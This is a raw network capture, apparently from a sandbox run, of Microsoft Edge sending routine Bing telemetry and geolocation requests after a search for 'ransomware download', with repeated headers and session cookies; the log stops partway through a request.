set-cookie: MUIDB=060B31E3593A60702C3D25D75802611A; expires=Tue, 25-Mar-2025 15:31:51 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1&BLOCK=TS=240229153151; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:51 GMT; path=/; secure; HttpOnly; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220711.b315a9b
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708561%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708561%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: CB5CE25CEBA644DE8A2A8A5728E8A477 Ref B: LTSEDGE1422 Ref C: 2024-02-29T15:31:51Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220711.b315a94
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22ShowAnimation%22%3A%22%22%2C%22RedDotAnimation%22%3A%22true%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AnimationLoad%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1709220708565%2C%22Name%22%3A%22AnimationLoad%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22ShowAnimation%22%3A%22%22%2C%22RedDotAnimation%22%3A%22true%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AnimationLoad%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1709220708565%2C%22Name%22%3A%22AnimationLoad%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 1566171E9F074AAE814AAF32DCBA7540 Ref B: LTSEDGE1906 Ref C: 2024-02-29T15:31:51Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220711.b315ba6
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2211%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22bingpages%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2212%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2211%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22bingpages%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2212%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220708581%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0EDF1435E9FA4270BA33D1FD1190F211 Ref B: LON04EDGE0811 Ref C: 2024-02-29T15:31:51Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220711.b315c3f
-
GEThttps://www.bing.com/geolocation/write?isBlocked=true&sid=172BBB3C780F696B1A6EAF0879376803&clientsid=undefinedmsedge.exeRemote address:92.123.128.152:443RequestGET /geolocation/write?isBlocked=true&sid=172BBB3C780F696B1A6EAF0879376803&clientsid=undefined HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 26EE63EAF5314DFC9ED9EB2CD87DC9CD Ref B: LON04EDGE0916 Ref C: 2024-02-29T15:31:51Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220711.b315c40
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialConfigDisabled%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1709220708582%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialConfigDisabled%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1709220708582%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4D9297705A30411AB5726E67134CFC0E Ref B: LON04EDGE0608 Ref C: 2024-02-29T15:31:51Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220711.b315c89
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708587%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708587%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A81C158A2C8C40B7875EA23084A2EA93 Ref B: LTSEDGE1912 Ref C: 2024-02-29T15:31:51Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220711.b315c9c
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708587%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708587%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
